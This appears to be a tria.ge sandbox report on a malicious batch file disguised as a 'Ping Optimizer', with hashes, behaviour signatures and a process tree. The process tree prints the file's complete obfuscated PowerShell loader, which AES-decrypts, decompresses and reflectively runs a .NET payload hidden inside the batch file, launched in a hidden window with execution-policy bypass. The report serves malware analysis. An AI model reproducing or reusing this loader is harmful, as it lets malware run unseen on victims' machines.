Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

1

PingOptimizerMain.bat

windows7-x64

1

PingOptimizerMain.bat

windows10-2004-x64

10

Resubmissions

09/01/2024, 11:27

240109-nkymhsgdcj 10

09/01/2024, 11:03

240109-m5m6vaffdq 10

Analysis

  • max time kernel
    57s
  • max time network
    18s
  • platform
    windows7_x64
  • resource
    win7-20231215-en
  • resource tags

    arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system
  • submitted
    09/01/2024, 11:03

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    PingOptimizerMain.bat

  • Size

    11.7MB

  • MD5

    ffc97bdf56ecbee34e263c88f330a9fd

  • SHA1

    7f83beb8534cdc3f3ee2147e74d6f698812f2859

  • SHA256

    d63b1658179ccc4b45c7f9726b83e32763850a046480b76a8f8920c709309b3e

  • SHA512

    09a9dbf6d13297a89ea4d1dbe56ae8f4485ecb832b8fe4cf302d805aa1077ed496e1e84024014ad2238b937fd09c21067112bf52aec373deaf4c20df51ae85c1

  • SSDEEP

    49152:zA8wtTTWxiw/n2WZfp8Nuw3PdwARNLfKu5LTEgwJt/eYr8ZLYY3GU80pJzgN5Vsi:X

Score
1/10

Malware Config

Signatures

  • Suspicious behavior: EnumeratesProcesses 33 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of FindShellTrayWindow 58 IoCs
  • Suspicious use of SendNotifyMessage 58 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\PingOptimizerMain.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2632
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo function JKKyH($CkPBl){ $vgKjD=[System.Security.Cryptography.Aes]::Create(); $vgKjD.Mode=[System.Security.Cryptography.CipherMode]::CBC; $vgKjD.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $vgKjD.Key=[System.Convert]::("@F@r@o@m@B@a@s@e@6@4@S@t@r@i@n@g@".Replace("@", ""))('26aOJFwTv97uDv+AU5goDn6hWx02gD9NOcdrvlCWKTI='); $vgKjD.IV=[System.Convert]::("@F@r@o@m@B@a@s@e@6@4@S@t@r@i@n@g@".Replace("@", ""))('It4ny7WARKm8v2w/mmx4aw=='); $IogOR=$vgKjD.CreateDecryptor(); $return_var=$IogOR.TransformFinalBlock($CkPBl, 0, $CkPBl.Length); $IogOR.Dispose(); $vgKjD.Dispose(); $return_var;}function HyrXz($CkPBl){ $gYrBV=New-Object System.IO.MemoryStream(,$CkPBl); $DaoGF=New-Object System.IO.MemoryStream; Invoke-Expression '$YOItl #=# #N#e#w#-#O#b#j#e#c#t# #S#y#s#t#e#m#.#I#O#.#C#o#m#p#r#e#s#s#i#o#n#.#G#Z#i#p#S#t#r#e#a#m#(#$gYrBV,# #[#I#O#.#C#o#m#p#r#e#s#s#i#o#n#.#C#o#m#p#r#e#s#s#i#o#n#M#o#d#e#]#:#:#D#e#c#o#m#p#r#e#s#s#)#;#'.Replace('#', ''); $YOItl.CopyTo($DaoGF); $YOItl.Dispose(); $gYrBV.Dispose(); $DaoGF.Dispose(); $DaoGF.ToArray();}function LrqQP($CkPBl,$BYqCB){ $nHbiH = @( '$dWXPX = [System.#R#e#f#l#e#c#t#i#o#n#.Assembly]::("@L@o@a@d@".Replace("@", ""))([byte[]]$CkPBl);'.Replace("#", ""), '$bnVJm = $dWXPX.EntryPoint;', '$bnVJm.Invoke($null, $BYqCB);' ); foreach ($bEYpH in $nHbiH) { Invoke-Expression $bEYpH };}$JVYeU=[System.IO.File]::("@R@e@a@d@A@l@l@T@e@x@t@".Replace("@", ""))('C:\Users\Admin\AppData\Local\Temp\PingOptimizerMain.bat').Split([Environment]::NewLine);foreach ($gjKds in $JVYeU) { if ($gjKds.StartsWith('SIROXEN')) { $QeetH=$gjKds.Substring(7); break; }}$tkNud=HyrXz (JKKyH ([Convert]::("@F@r@o@m@B@a@s@e@6@4@S@t@r@i@n@g@".Replace("@", ""))($QeetH)));LrqQP $tkNud (,[string[]] ('C:\Users\Admin\AppData\Local\Temp\PingOptimizerMain.bat')); "
      2⤵
        PID:2516
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ep bypass -noprofile -windowstyle hidden
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2464
    • C:\Windows\system32\taskmgr.exe
      "C:\Windows\system32\taskmgr.exe" /4
      1⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SendNotifyMessage
      PID:2960

    Network

    MITRE ATT&CK Matrix

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • memory/2464-4-0x000007FEF5250000-0x000007FEF5BED000-memory.dmp

      Filesize

      9.6MB

      Download

    • memory/2464-5-0x0000000002790000-0x0000000002810000-memory.dmp

      Filesize

      512KB

      Download

    • memory/2464-7-0x0000000002790000-0x0000000002810000-memory.dmp

      Filesize

      512KB

      Download

    • memory/2464-6-0x000000001B100000-0x000000001B3E2000-memory.dmp

      Filesize

      2.9MB

      Download

    • memory/2464-8-0x000007FEF5250000-0x000007FEF5BED000-memory.dmp

      Filesize

      9.6MB

      Download

    • memory/2464-9-0x0000000002290000-0x0000000002298000-memory.dmp

      Filesize

      32KB

      Download

    • memory/2464-10-0x0000000002790000-0x0000000002810000-memory.dmp

      Filesize

      512KB

      Download

    • memory/2464-11-0x000007FEF5250000-0x000007FEF5BED000-memory.dmp

      Filesize

      9.6MB

      Download

    • memory/2464-12-0x0000000002790000-0x0000000002810000-memory.dmp

      Filesize

      512KB

      Download

    • memory/2464-13-0x0000000002790000-0x0000000002810000-memory.dmp

      Filesize

      512KB

      Download

    • memory/2464-14-0x0000000002790000-0x0000000002810000-memory.dmp

      Filesize

      512KB

      Download

    • memory/2960-15-0x0000000140000000-0x00000001405E8000-memory.dmp

      Filesize

      5.9MB

      Download

    • memory/2960-16-0x0000000140000000-0x00000001405E8000-memory.dmp

      Filesize

      5.9MB

      Download

    • memory/2960-18-0x0000000140000000-0x00000001405E8000-memory.dmp

      Filesize

      5.9MB

      Download

    • memory/2960-19-0x0000000140000000-0x00000001405E8000-memory.dmp

      Filesize

      5.9MB

      Download